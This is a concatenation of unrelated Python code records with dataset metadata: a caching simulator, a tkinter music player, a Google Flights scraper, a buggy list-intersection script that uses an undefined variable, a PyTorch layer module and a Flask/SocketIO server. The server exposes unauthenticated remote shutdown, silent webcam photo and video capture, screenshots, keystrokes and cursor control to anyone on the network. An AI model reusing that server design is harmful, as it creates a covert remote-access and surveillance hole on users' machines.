copy\nimport os\nimport time\nimport sys\n\nexperiment_type = sys.argv[1]\nfile_name_extension = sys.argv[2]\n\nclass Simulator:\n def __init__(self, dim, capacity, no_objects, alpha, iter, update_interval, learning_rate):\n self.grid_d = 313\n\n self.obj_catalogue = ObjectCatalogueGrid(self.grid_d, self.grid_d, experiment_type) \n\n self.cache = CacheGridReal(capacity, dim, learning_rate, True, [self.grid_d, self.grid_d])\n\n self.cache.initializeIterativeSearch([self.grid_d, self.grid_d])\n \n self.iter = iter\n\n self.u_interval = update_interval\n\n self.descent = StochasticGradientDescent(learning_rate, self.grid_d)\n\n self.plot = Plots(experiment_type, file_name_extension)\n\n self.initial_points = self.cache.getAllPoints() \n\n self.learning_rate = learning_rate\n\n os.system(\"mkdir \" + str(self.grid_d) + \"_\" + str(learning_rate) + \"_\" + experiment_type + \"_\" + file_name_extension) \n \n self.cache_capacity = capacity\n\n def write_stat(self, i, obj, f, cache_size):\n f.write(str(i) + \"\\t\" + str(obj) + \"\\t\" + str(cache_size))\n f.write(\"\\n\")\n f.flush()\n \n def write_rare_requests(self, req, np, f):\n f.write(' '.join([str(r) for r in req]))\n f.write(' ')\n f.write(' '.join([str(p) for p in np]))\n f.write('\\n')\n f.flush()\n \n def write_distance_count(self, distance_count, f):\n for d in distance_count:\n f.write(str(d) + \" \" + str(distance_count[d]) + \"\\n\")\n f.flush()\n\n def write_stat_debug(self, f2, obj, nearest_obj, mapped_x, mapped_y):\n f2.write(\"Request : \" + ' '.join([str(x) for x in obj]) + \" Nearest : \" + ' '.join([str(x) for x in nearest_obj]) + \" Mapped : \" + str(mapped_x) + \" \" + str(mapped_y) + '\\n')\n f2.flush()\n\n def simulate(self):\n\n def l1_dist(p1, p2):\n return np.linalg.norm(p1 - p2, ord=1)\n\n objective = [] \n objective_value = 0\n \n count = 0\n prev_i = 0\n jump_interval = 1\n\n number_obj = len(self.cache.getAllPoints())\n\n f = open(str(self.grid_d) + '_' + str(self.learning_rate) + '_' + experiment_type + '_' + file_name_extension + '/' + str(\"objective\") + '.txt', 'w') \n f2 = open(str(self.grid_d) + '_' + str(self.learning_rate) + '_' + experiment_type + '_' + file_name_extension + '/' + str(\"debug\") + '.txt', 'w') \n cost = 0\n\n Threshold = 10\n\n for i in range(1,self.iter):\n\n if experiment_type == \"uniform\" :\n obj = self.obj_catalogue.getRequest()\n elif experiment_type == \"gaussian\" :\n obj = self.obj_catalogue.getRequestGaussian()\n elif experiment_type == \"gaussian2\" :\n obj = self.obj_catalogue.getRequestGaussian2()\n elif experiment_type == \"gaussian_real\" :\n obj = self.obj_catalogue.getRequestGaussian2()\n\n pos = obj\n\n if i % self.u_interval == 0: \n\n \n if i - prev_i >= jump_interval:\n \n #objective_value = self.obj_catalogue.objective_l1_iterative_threaded(self.cache, experiment_type) \n #objective_value = objective_value/(self.obj_catalogue.total_rate)\n \n objective_value = float(cost)/jump_interval\n\n objective.append(objective_value)\n\n\n number_points = len(self.cache.getAllPoints())\n\n print(\"iter : \", i, \"objective : \", objective_value, number_points)\n\n self.write_stat(i, objective_value, f, number_points) \n\n if i < 100000 and i == 10 * jump_interval:\n jump_interval *= 10\n elif i == 100000 and i == 10 * jump_interval:\n pass\n elif i == 100 * jump_interval:\n jump_interval *= 10\n\n prev_i = i\n\n self.plot.plot_cache_pos_grid(self.cache.getAllPoints(), self.obj_catalogue.means, self.initial_points, count, [self.grid_d, self.grid_d], self.learning_rate)\n count += 1 \n\n cost = 0\n\n\n if experiment_type != \"gaussian_real\": \n [nearest_obj, dst, mapped_x, mapped_y] = self.cache.findNearest(pos) \n new_object_loc = self.descent.descent(nearest_obj, obj) \n self.cache.updateCacheDict(nearest_obj, new_object_loc, mapped_x, mapped_y) \n\n else :\n if i < 4 * self.grid_d: \n if len(self.cache.getAllPoints()) < self.grid_d:\n self.cache.insertInit(obj)\n continue\n\n [nearest_obj, dst, mapped_x, mapped_y] = self.cache.findNearestVirtual(pos) \n\n new_object_loc = self.descent.descent(nearest_obj, obj, \"gaussian_real\") \n\n ## Update the required tables after descending\n self.cache.updateVirtualObjectAndFreq(nearest_obj, new_object_loc, mapped_x, mapped_y) \n \n #no_points = len(self.cache.getAllPoints())\n\n if dst <= Threshold : ## Virtual hit\n\n mapped_real_object = self.cache.getReal(new_object_loc)\n\n print(\" Mapped real object : \", mapped_real_object, \" Requested object : \", obj)\n dist = l1_dist(pos, mapped_real_object)\n\n ## If the object in catalogue is the nearest real object to the virtual object\n if dist <= 1: \n cost += dist\n \n ## If there is an object which is closer to the virtual object\n elif dist <= Threshold : # physical hit\n #print(\" Physical hit \")\n\n ## With some probability insert the object never the less\n check_if_in_real_cache = (obj[0] == mapped_real_object[0] and obj[1] == mapped_real_object[1])\n dst2 = l1_dist(np.array([mapped_real_object[0], mapped_real_object[1]]), np.array([nearest_obj[0], nearest_obj[1]]))\n if_better_object = dst < dst2\n\n if random.random() < 0.02 and check_if_in_real_cache == False and if_better_object: \n #print(\"Evicting and inserting a new object \", obj)\n self.cache.insert(obj)\n cost += Threshold \n cost += dst\n else:\n cost += l1_dist(mapped_real_object, obj)\n else:\n ## it is a virtual hit and a physical miss, so fetch the nearest object in the cache and insert\n ## the object in the cache\n\n nearest_catalogue = self.obj_catalogue.nearestObject(nearest_obj)\n nearest_catalogue = np.array([nearest_catalogue[0], nearest_catalogue[1]])\n \n approx_cost = l1_dist(nearest_catalogue, obj) \n\n if approx_cost <= Threshold: \n ## We should almost always end up here \n #print(\"Evicting and inserting a new object \", obj) \n cost += Threshold\n cost += approx_cost\n self.cache.insert(nearest_catalogue)\n else :\n cost += Threshold\n\n else:\n [nearest_obj, dst, mapped_x, mapped_y] = self.cache.findNearestReal(pos) \n\n if dst <= Threshold: ## physical hit and virtual miss:\n cost += dst\n else :\n cost += Threshold\n\n \n# if len(self.cache.getAllPoints()) > 313:\n# print(\"iter : \", i, \"Request : \", obj, \" Nearest : \", nearest_obj, \" Mapped : \", mapped_x, mapped_y)\n# self.write_stat_debug(f2, obj, nearest_obj, mapped_x, mapped_y)\n# break\n \n f2 = open(str(self.grid_d) + '_' + str(self.learning_rate) + '_' + experiment_type + '_' + file_name_extension + '/distances.txt', 'w')\n self.write_distance_count(self.obj_catalogue.obj_count_distance, f2)\n f2.write(str(len(self.cache.getAllPoints())))\n f2.close()\n\ns = Simulator(2, 313, 100, 0.4, 100000000, 1, 0.01)\ns.simulate() \n\n\n\n \n\n\n\n \n","sub_path":"similarity-caching/simulator_real_backup.py","file_name":"simulator_real_backup.py","file_ext":"py","file_size_in_byte":9489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"216188771","text":"#! /usr/bin/env python3\n# -*- coding:utf-8 -*-\n# Author: LiPingping\n# Time: 2021/10/14 14:47\n# Desc: Music player copied from: https://www.pythonf.cn/read/123250\n\nimport tkinter\nfrom PIL import Image, ImageTk\nimport pygame\nimport time\nimport os\nfrom tkinter.filedialog import askopenfilename\nfrom tkinter.filedialog import askdirectory\nfrom tkinter import ttk\nimport eyed3\nimport librosa\nimport random\n\n# import 旋律生成 as cmusic\n# import melody_generation as cmusic\n\ntop = tkinter.Tk() # 窗口\ntop.geometry('800x400') # 窗口大小\ntop.title('【书生君陌】音乐播放器') # 窗口名称\n\n\n# loop1=1#循环定义\n# stime=1#时间\n\ndef screen(t): # 透明度设置\n t = int(t)\n top.attributes('-alpha', t / 100) # 设置透明度\n\n\nwidth = top.winfo_screenwidth() # 宽度\nheight = top.winfo_screenheight() - 100 # 高度\n\npygame.init() # 窗口初始化\nfile = tkinter.StringVar() # 获得文件列表\nfiles = tkinter.StringVar() # 获得文件列表\nfilename = tkinter.StringVar()\nfilenames = []\nv = tkinter.StringVar() # 获得文件列表\nv1 = tkinter.StringVar() # 获得文件列表\nvar_mode = tkinter.IntVar() # 播放顺序\nvar_mode2 = tkinter.IntVar() # 播放状态\nvar_mode3 = tkinter.IntVar() # 播放进度\nv2 = tkinter.DoubleVar() # 播放进度\nlongt = 1\n\n\ndef search(): # 搜索文件\n # file_=askopenfilename()\n file_ = askdirectory()\n return file_\n\n\ndef voice(t): # 音量\n t = int(t)\n pygame.mixer.music.set_volume(t / 100) # 设置音量\n\n\ndef showtime(): # 显示时间\n c = time.strftime(\"%H:%M:%S\")\n stime.configure(text=c)\n\n num = pygame.mixer.music.get_pos() / 1000\n print('jindu', num, longt, float(num / longt))\n w3.set(int(num / longt * 100))\n print(w3.get())\n\n top.after(1000, showtime)\n\n\ndef musicplay():\n global filename, filenames\n f = search() # 选择文件夹\n # print(f)\n filename = f\n file.set(f)\n f = os.listdir(f)\n filenames = []\n for fname in f:\n fp = os.path.join(fname)\n filenames.append(fp)\n c2['value'] = filenames\n c2.current(0)\n # lbTime = tkinter.Label(top, anchor='w')\n # lbTime.place(x=25, y=150)\n\n\ndef start():\n # print(filename+c2.get())\n global longt\n var_mode2.set(1)\n print(type(filename), type( c2.get()))\n print(filename + '/' + c2.get())\n pygame.mixer.music.load(filename + '/' + c2.get())\n # longt=int(librosa.get_duration(filename=filename+'/'+c2.get()))\n if c2.get()[-4:] == '.mp3':\n longt = eyed3.load(filename + '/' + c2.get())\n longt = int(longt.info.time_secs)\n else:\n longt = 39\n print(longt)\n print(var_mode.get())\n pygame.mixer.music.play()\n # w3.set(0)\n # pygame.mixer.music.play() # 停止播放\n\n\ndef stop():\n var_mode2.set(0)\n pygame.mixer.music.stop() # 停止播放\n\n\ndef pause():\n var_mode2.set(0)\n pygame.mixer.music.pause() # 暂停\n\n\ndef unpause():\n var_mode2.set(1)\n pygame.mixer.music.unpause() # 继续播放\n\n\ndef picture(): # 保存的路径不能有中文,若需要中文则吧/换成\\\n path_s = askopenfilename()\n files.set(path_s)\n img_open = Image.open(e1.get())\n img = ImageTk.PhotoImage(img_open)\n l1.config(image=img)\n l1.image = img\n\n\n# def create():\n# top = tkinter.Toplevel()\n# top.title('使用提示')\n# top.geometry(\"400x400\")\n# t = \"关于照片,新建一个存放图片的文件,用英文命名,然后存里面的图片也用英文命名。关于音乐: 新建一个名字叫音乐的文件,把歌曲添加到该文件夹。\"\n# msg = tkinter.Message(top, text=t)\n# msg.config(font=('times', 24, 'italic'))\n# msg.place(x=0, y=0)\n\ndef gettime():\n t = time.strftime('%H%M%S')\n s = int(t[0:2])\n d = int(t[2:4])\n f = int(t[4:6])\n g = s * 60 * 60 + d * 60 + f\n return g\n\n\ndef Listloop():\n global var_mode2\n print(pygame.mixer.music.get_busy(), var_mode.get())\n if var_mode.get() == 1 and pygame.mixer.music.get_busy() == False and var_mode2.get() == 1:\n start()\n elif var_mode.get() == 2 and pygame.mixer.music.get_busy() == False and var_mode2.get() == 1:\n stop()\n elif var_mode.get() == 3 and pygame.mixer.music.get_busy() == False and var_mode2.get() == 1:\n print(c2.get())\n print(filenames)\n num = filenames.index(c2.get())\n if num < len(filenames) - 1:\n c2.current(num + 1)\n else:\n c2.current(0)\n print(c2.get())\n start()\n elif var_mode.get() == 4 and pygame.mixer.music.get_busy() == False and var_mode2.get() == 1:\n print(c2.get())\n print(filenames)\n num = filenames.index(c2.get())\n if num < len(filenames) - 1:\n c2.current(num + 1)\n print(c2.get())\n start()\n else:\n stop()\n elif var_mode.get() == 5 and pygame.mixer.music.get_busy() == False and var_mode2.get() == 1:\n print(c2.get())\n print(filenames)\n num = random.randint(0, len(filenames))\n c2.current(num)\n print(num, c2.get())\n start()\n # elif var_mode3.get()==0:\n # var_mode3.set(1)\n top.after(3000, Listloop)\n\n\ndef create():\n # cmusic.creatmusic(filename+'/'+e1.get())\n # f=os.listdir(filename)\n # filenames=[]\n # for fname in f:\n # fp=os.path.join(fname)\n # filenames.append(fp)\n # c2['value'] = filenames\n pass\n\n\n# def lenth(v2):\n# global var_mode2,var_mode3\n# var_mode2.set(1)\n# print(v2)\n# var_mode3.set(int(v2) / 100)\n# print(var_mode3.get())\n# pygame.mixer.music.play(0,num*longt)\n# print('hi',pygame.mixer.music.get_busy(),var_mode3.get())\n\n# def jindu():\n# num=pygame.mixer.music.get_pos()\n# print('jindu',num)\n# w3.set(num/longt)\n# print(w3.get())\n# top.after(1000,jindu)\n\nif __name__ == \"__main__\":\n errmsg = 'Error!'\n img_open = Image.open('/home/lee/Pictures/Screenshot from 2021-09-08 11-51-57.png')\n img = ImageTk.PhotoImage(img_open)\n pygame.mixer.music.set_volume(1) # 设置音量\n top.attributes('-alpha', 1) # 设置透明度\n # Listloop()\n var_mode2.set(0)\n # var_mode3.set(1)\n # 选择文件\n tkinter.Button(top, text=\"选择文件夹\", command=musicplay, width=10, bg=\"sky blue\").place(x=20, y=20)\n tkinter.Entry(top, text=file, width=25, state='readonly').place(x=120, y=20)\n\n c2 = ttk.Combobox(top, width=22)\n c2.pack()\n c2.place(x=120, y=90)\n # 选择图片\n tkinter.Button(top, text='选择图片', command=picture, width=10, bg=\"sky blue\").place(x=20, y=55)\n e1 = tkinter.Entry(top, text=files, state='readonly', width=25)\n e1.place(x=120, y=55)\n l1 = tkinter.Label(top) # 图片放置位置\n l1.place(x=320, y=0)\n l1.config(image=img)\n l1.image = img\n # 播放设置\n var_mode.set(1)\n sinloop = tkinter.Radiobutton(top, variable=var_mode, value=1, text=\"单曲循环\")\n sinloop.place(x=20, y=100)\n single = tkinter.Radiobutton(top, variable=var_mode, value=2, text=\"单曲播放\")\n single.place(x=20, y=120)\n allloop = tkinter.Radiobutton(top, variable=var_mode, value=3, text=\"列表循环\")\n allloop.place(x=20, y=140)\n allsin = tkinter.Radiobutton(top, variable=var_mode, value=4, text=\"顺序播放\")\n allsin.place(x=20, y=160)\n ranloop = tkinter.Radiobutton(top, variable=var_mode, value=5, text=\"随机播放\")\n ranloop.place(x=20, y=180)\n # 开始,暂停,继续播放,结束播放\n tkinter.Button(top, text=\"开始播放\", command=start, width=7, bg=\"sky blue\").place(x=100, y=225)\n tkinter.Button(top, text=\"暂停播放\", command=pause, width=7, bg=\"sky blue\").place(x=170, y=245)\n tkinter.Button(top, text=\"继续播放\", command=unpause, width=7, bg=\"sky blue\").place(x=170, y=205)\n tkinter.Button(top, text=\"结束播放\", command=stop, width=7, bg=\"sky blue\").place(x=240, y=225)\n # 自己生成旋律\n e2 = tkinter.Entry(top, text='编曲名称', width=25)\n e2.place(x=120, y=130)\n e2.insert(0, '中国风')\n tkinter.Button(top, text=\"随机编曲\", command=create, width=7, bg=\"sky blue\").place(x=170, y=165)\n\n # 音量\n v.set('100')\n w1 = tkinter.Scale(top, from_=0, to=100, orient=\"horizontal\", length=100, variable=v, command=voice, label=\"音量\")\n w1.place(x=20, y=290)\n w1.set(100)\n # 透明度\n v1.set('100')\n w2 = tkinter.Scale(top, from_=30, to=100, orient=\"horizontal\", length=100, variable=v1, command=screen, label=\"透明度\")\n w2.place(x=180, y=290)\n w2.set(100)\n # 播放进度\n v2.set(0.0)\n w3 = tkinter.Scale(top, from_=0, to=100, orient=\"horizontal\", width=10, length=475, variable=v2)\n w3.place(x=320, y=360)\n w3.set(0)\n\n # 时间\n stime = tkinter.Label(top, text=\"\", font=(\"Helvetica\", 15))\n stime.place(x=110, y=350)\n showtime()\n top.mainloop()\n","sub_path":"tests/music_player_demo1.py","file_name":"music_player_demo1.py","file_ext":"py","file_size_in_byte":8876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"198448723","text":"#!/usr/bin/env python3\nfrom pyvirtualdisplay import Display\nimport time, requests, random\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nfrom writeout import write_out_to_log\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\n\nurl_ip_location = 'http://ipinfo.io/json'\nr = requests.get(url_ip_location).json()\nr = r['city']\n\nwebsite = 'https://www.google.com/flights/#search;f=JFK,EWR,LGA;t=LHR;'\ndates = [\n ['d=2018-03-25;r=2018-03-31', 'f1'],\n ['d=2018-03-18;r=2018-03-31', 'f2'],\n ['d=2018-03-11;r=2018-03-31', 'f3'],\n ['d=2018-03-04;r=2018-03-31', 'f4'],\n ['d=2018-03-25;r=2018-03-31', 'f5'],\n ['d=2018-03-18;r=2018-03-25', 'f6'],\n ['d=2018-03-11;r=2018-03-18', 'f7'],\n ['d=2018-03-04;r=2018-03-11', 'f8']\n ]\npayload = {}\n\ndisplay = Display(visible=0, size=(1920, 1080)).start()\nfirefox_capabilities = DesiredCapabilities.FIREFOX\nfirefox_capabilities['marionette'] = True\nfirefox_capabilities['binary'] = '/usr/bin/firefox'\n\n\ndef init_driver():\n driver = webdriver.Firefox(capabilities=firefox_capabilities)\n driver.wait = WebDriverWait(driver, 5)\n return driver\n\n\ndef lookup(driver):\n\n # loads page\n for date in dates:\n time.sleep(random.uniform(1, 6))\n driver.get(website+date[0])\n\n timeout = 20\n try:\n WebDriverWait(driver, timeout)\n driver.implicitly_wait(10)\n # get text within div class\n element = driver.find_element_by_class_name('LJV2HGB-d-Ab')\n price = (element.get_attribute('innerHTML'))\n # price = price[1:]\n payload[date[1]] = [price, r, date[1]]\n except TimeoutException:\n print(\"Error\")\n driver.quit()\n\nif __name__ == \"__main__\":\n # init driver\n driver = init_driver()\n # tell driver to look up query on google\n lookup(driver)\n write_out_to_log(payload, region=r)\n\n # close driver\n driver.quit()\n","sub_path":"firefox_selenium_script.py","file_name":"firefox_selenium_script.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"582486172","text":"str1_input = input()\nstr2_input = input()\nstr1_valid = str1_input[1:-1]\nstr2_valid = str2_input[1:-1]\nnums1 = str1_valid.split(',')\nnums2 = str2_valid.split(',')\nnums1 = [int(x) for x in nums1]\nnums2 = [int(x) for x in nums2]\nnums1 = set(nums1)\nnums2 = set(nums2)\nnums1.intersection_update(nums2)\nnums1 = list(nums1)\nnums1.sort()\nfor i in range(len(nums)):\n if i == 0:\n print('[' + str(nums[i]), end = ', ')\n elif i == len(nums) - 1:\n print(str(nums[i]) + ']', end = '')\n else:\n print(str(nums[i]), end = ', ')\n ","sub_path":"Code/CodeRecords/2490/60870/282844.py","file_name":"282844.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"554564504","text":"\n#web cakeraeov knkare video\n# heto sra het mek tegh dzaynel kavelacnem\n\ndef is_number(s):\n\ttry: \n\t\tfloat(s)\n\t\treturn True\n\texcept ValueError:\n\t\treturn False\n\n\nvideo_finish = False\ndef hello():\n\tglobal video_finish\n\tvideo_finish = True\n\ndef RecordVideoToWebcam(settimeout=60):\n\ttry:\n\t\t# This will return video from the first webcam on your computer. \n\t\tcap = cv2.VideoCapture(0) \n\n\t\t# Define the codec and create VideoWriter object \n\t\tfourcc = cv2.VideoWriter_fourcc(*'XVID') \n\t\tout = cv2.VideoWriter(os.path.join('static/public/webcam', 'video.mp4'), fourcc, 5.0, (640, 480)) \n\n\n\t\tt = threading.Timer(settimeout, hello)\n\t\tt.start()\n\n\t\t# loop runs if capturing has been initialized. \n\t\twhile(True): \n\t\t\t# reads frames from a camera \n\t\t\t# ret checks return at each frame \n\t\t\tret, frame = cap.read() \n\n\n\t\t\tout.write(frame) \n\n\n\t\t\tif video_finish == True:\n\t\t\t\tt.cancel()\n\t\t\t\tbreak\n\n\n\t\t# Close the window / Release webcam \n\t\tcap.release() \n\n\t\t# After we release our webcam, we also release the output \n\t\tout.release() \n\n\t\t# De-allocate any associated memory usage \n\t\tcv2.destroyAllWindows() \n\texcept Exception:\n\t\tpass\n\tfor i in range(30):\n\t\tcap.read()\n\t\n\n# webcakerayov photo e anum\n\ndef PhotoToWebcam():\n\ttry:\n\t\t# Включаем первую камеру\n\t\tcap = cv2.VideoCapture(0)\n\t\t# \"Прогреваем\" камеру, чтобы снимок не был тёмным\n\t\tfor i in range(30):\n\t\t\tcap.read()\n\t\t# Делаем снимок \n\t\tret, frame = cap.read()\n\t\t# Записываем в файл\n\t\tcv2.imwrite(os.path.join('static/public/webcam', 'screen.png'), frame) \n\t\t# Отключаем камеру\n\t\tcap.release()\n\texcept Exception:\n\t\tpass\n\nLastPlaySound = ''\n\ndef SelectFunction(filename):\n\tglobal LastPlaySound\n\tmixer.music.load(os.path.join('public/audio', filename))\n\tmixer.music.play()\n\tLastPlaySound = filename\n\n\n#vercnum e file-i formaty\ndef GetFormat(_str_):\n\tl = ''\n\tfor x in range(len(_str_)-1,-1,-1):\n\t\tif _str_[x] == '.':\n\t\t\tbreak\n\t\tl+=_str_[x]\n\treturn l[::-1].lower()\n\n'''\n# commands\n\nshutdown\nplaysound\nscreenshot-Webcam\nrecord-video-Webcam\n\n'''\n\nimport time\nimport pyautogui\nimport threading\nimport cv2\nfrom pygame import mixer\nmixer.init()\n\nfrom flask import Flask, render_template, request, redirect, url_for\nfrom flask_socketio import SocketIO, send, emit\n\nimport os\nfrom werkzeug.utils import secure_filename\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'secret!'\nsocketio = SocketIO(app)\n\nUPLOAD_FOLDER = '/static'\n\n\n\n@socketio.on('sev')\ndef handle_cmd(message):\n\tprint()\n\tprint(message)\n\tprint()\n\t# os.system(\"shutdown /p\")\n\tlist_message = message.split()\n\n\tif not len(list_message) <= 1:\n\t\tif list_message[0] == 'sudo':\n\t\t\tif str(list_message[1]) == 'shutdown':\t\n\t\t\t\tos.system('shutdown -s')\n\n\t\t\telif list_message[1] == 'playsound':\n\t\t\t\tif (list_message[2] == '-r' or list_message[2] == '-resert') and LastPlaySound != '':\n\t\t\t\t\tget_play_bool = mixer.music.get_busy()\n\t\t\t\t\tif get_play_bool:\n\t\t\t\t\t\tmixer.music.rewind()\n\t\t\t\t\telse:\n\t\t\t\t\t\tmixer.music.load(os.path.join('public/audio', LastPlaySound))\n\t\t\t\t\t\tmixer.music.play()\n\t\t\t\telif list_message[2] == '-setpos':\n\n\t\t\t\t\tprint('sa der petq e kargavorel araj het chi talis')\n\t\t\t\t\t\n\t\t\t\telif list_message[2] == '-v' or list_message[2] == '-value':\n\t\t\t\t\tif is_number(list_message[3]):\n\t\t\t\t\t\tmixer.music.set_volume(float(list_message[3]))\n\t\t\t\t\t\tvolume = float(list_message[3])\n\n\t\t\t\telif list_message[2] == '-p'or list_message[2] == '-pause':\n\t\t\t\t\tmixer.music.pause()\n\t\t\t\telif list_message[2] == '-u' or list_message[2] == '-unpause':\n\t\t\t\t\tmixer.music.unpause()\n\t\t\t\t#estegh petq e ergy egri hamakargichov\n\t\t\telif list_message[1] == 'photo-Webcam':\n\t\t\t\tPhotoToWebcam()\n\n\t\t\telif list_message[1] == 'video-Webcam':\n\t\t\t\tRecordVideoToWebcam()\n\n\t\t\t\t\n\t\t\telif list_message[1] == 'window':\n\t\t\t\tif list_message[2] == 'screenshot':\n\t\t\t\t\tpyautogui.screenshot('static/public/screenshot/foo.png')\n\t\telif list_message[0] == 'keyboard':\n\t\t\t# pyautogui.press(list_message[1],presses=2)\n\t\t\t# pyautogui.press(''.join(list_message)[-1])\n\t\t\tif list_message[1] == 'press':\n\t\t\t\ttext_val = ' '.join(list_message[2:])\n\t\t\t\tif not len(text_val) == 0:\t\n\t\t\t\t\t# pyautogui.write(text_val, interval=0.1)\n\t\t\t\t\t# pyautogui.write(text_val, interval=0.1)\n\n\t\t\t\t\tpyautogui.press(text_val)\n\t\t\telif list_message[1] == 'hotkey':\n\t\t\t\tlist_hotkey = ' '.join(list_message[2:]).split()\n\n\t\t\t\tif len(list_hotkey) <= 5:\n\n\t\t\t\t\tfor x in range(0,5-len(list_hotkey)):\n\t\t\t\t\t\tlist_hotkey.append('')\n\t\t\t\t\tpyautogui.hotkey(list_hotkey[0],list_hotkey[1],list_hotkey[2],list_hotkey[3],list_hotkey[4])\n\n\n\t\telif list_message[0] == 'cursor':\n\n\t\t\tscreenWidth, screenHeight = pyautogui.size() # Get the size of the primary monitor.\n\n\t\t\tcurrentMouseX, currentMouseY = pyautogui.position() # Get the XY position of the mouse.\n\n\t\t\t# pyautogui.write('Hello world!', interval=0.25)\n\t\t\t# print(list_message[1],list_message[2])\n\t\t\t# print(pyautogui.position())\n\t\t\tX,Y = pyautogui.position()\n\n\n\t\t\tX+= int(list_message[1])\n\t\t\tY+= int(list_message[2])\n\t\t\t# # pyautogui.press(list_message[1],presses=2)\n\t\t\t# pyautogui.moveTo(X,Y,duration=0.5)\n\n\n\n\n\n\t\t\tpyautogui.moveTo(X, Y, duration=0.5) # move mouse to XY coordinates over num_second seconds\n\t\t\t# pyautogui.moveRel(xOffset, yOffset, duration=num_seconds) # move mouse relative to its current position\n\n\n@app.route('/')\ndef index():\n\treturn render_template('index.html')\n\n\nALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif','mp4','mp3'])\n\ndef allowed_file(filename):\n\treturn '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_file():\n\tif request.method == 'POST':\n\t\tif 'AudioPlayFile' not in request.files:\n\t\t\treturn 'No file selected'\n\t\tfile = request.files['AudioPlayFile']\n\n\t\tif file.filename == '':\n\t\t\treturn \"No file selected\"\n\t\tif file and allowed_file(file.filename):\n\t\t\tfilename = secure_filename(file.filename)\n\t\t\tAudioDir = 'audio'\n\t\t\tFormatName = {\n\t\t\t\t'mp3': AudioDir,\n\t\t\t\t'wav': AudioDir\n\t\t\t}\n\t\t\tif FormatName.get(GetFormat(filename)) != None:\n\t\t\t\t\n\t\t\t\tfile.save(os.path.join('public/audio'.format(AudioDir), filename))\n\t\t\t\n\t\t\t\tSelectFunction(filename)\n\n\treturn redirect(url_for('index'))\n\n\n\nif __name__ == '__main__':\n\tapp.run(debug=True, host='0.0.0.0',port=80)\n# ,port=80\n\n\n\n# # ipconfig\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":6270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"82667394","text":"import torch\nimport math\nimport torch.nn.functional as F\nfrom torch.nn.modules import Module\nfrom torch.nn.parameter import Parameter\nfrom torch.nn.modules.utils import _pair as pair\nfrom torch.autograd import Variable\nfrom torch.nn import init\n\nlimit_a, limit_b, epsilon = -.1, 1.1, 1e-6\n\nclass MAPDense(Module):\n\n def __init__(self, in_features, out_features, bias=True, weight_decay=0., name='', **kwargs):\n super(MAPDense, self).__init__()\n self.layer_name = name\n self.in_features = in_features\n self.out_features = out_features\n self.weight = Parameter(torch.Tensor(in_features, out_features))\n self.weight_decay = weight_decay\n if bias:\n self.bias = Parameter(torch.Tensor(out_features))\n else:\n self.register_parameter('bias', None)\n self.floatTensor = torch.FloatTensor if not torch.cuda.is_available() else torch.cuda.FloatTensor\n self.reset_parameters()\n print(self)\n\n def reset_parameters(self):\n init.kaiming_normal(self.weight, mode='fan_out')\n\n if self.bias is not None:\n self.bias.data.normal_(0, 1e-2)\n\n def _reg_w(self, **kwargs):\n logpw = - torch.sum(self.weight_decay * .5 * (self.weight.pow(2)))\n logpb = 0\n if self.bias is not None:\n logpb = - torch.sum(self.weight_decay * .5 * (self.bias.pow(2)))\n return logpw + logpb\n\n def regularization(self):\n return self._reg_w()\n\n def forward(self, input):\n output = input.mm(self.weight)\n if self.bias is not None:\n output.add_(self.bias.view(1, self.out_features).expand_as(output))\n return output\n\n def __repr__(self):\n return self.__class__.__name__ + ' (' \\\n + str(self.in_features) + ' -> ' \\\n + str(self.out_features) + ', weight_decay: ' \\\n + str(self.weight_decay) + ')'\n\n\nclass MAPConv2d(Module):\n def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True,\n name='', **kwargs):\n super(MAPConv2d, self).__init__()\n self.weight_decay = 0\n self.floatTensor = torch.FloatTensor if not torch.cuda.is_available() else torch.cuda.FloatTensor\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.kernel_size = pair(kernel_size)\n self.stride = pair(stride)\n self.padding = pair(padding)\n self.dilation = pair(dilation)\n self.output_padding = pair(0)\n self.groups = groups\n self.weight = Parameter(torch.Tensor(out_channels, in_channels // groups, *self.kernel_size))\n if bias:\n self.bias = Parameter(torch.Tensor(out_channels))\n else:\n self.register_parameter('bias', None)\n self.sparse = False\n\n self.input_shape = None\n self.layer_name = name\n self.reset_parameters()\n print(self)\n\n def reset_parameters(self):\n init.kaiming_normal(self.weight, mode='fan_in')\n if self.bias is not None:\n self.bias.data.normal_(0, 1e-2)\n\n def _reg_w(self, **kwargs):\n if self.sparse:\n return 0\n logpw = - torch.sum(self.weight_decay * .5 * (self.weight.pow(2)))\n logpb = 0\n if self.bias is not None:\n logpb = - torch.sum(self.weight_decay * .5 * (self.bias.pow(2)))\n return logpw + logpb\n\n def regularization(self):\n return self._reg_w()\n\n\n def forward(self, input_):\n if self.input_shape is None:\n self.input_shape = input_.size()\n output = F.conv2d(input_, self.weight, self.bias, self.stride, self.padding, self.dilation, self.groups)\n return output\n\n def __repr__(self):\n s = ('{name}{layer_name}({in_channels}, {out_channels}, kernel_size={kernel_size} '\n ', stride={stride}, weight_decay={weight_decay}')\n if self.padding != (0,) * len(self.padding):\n s += ', padding={padding}'\n if self.dilation != (1,) * len(self.dilation):\n s += ', dilation={dilation}'\n if self.output_padding != (0,) * len(self.output_padding):\n s += ', output_padding={output_padding}'\n if self.groups != 1:\n s += ', groups={groups}'\n if self.bias is None:\n s += ', bias=False'\n s += ')'\n 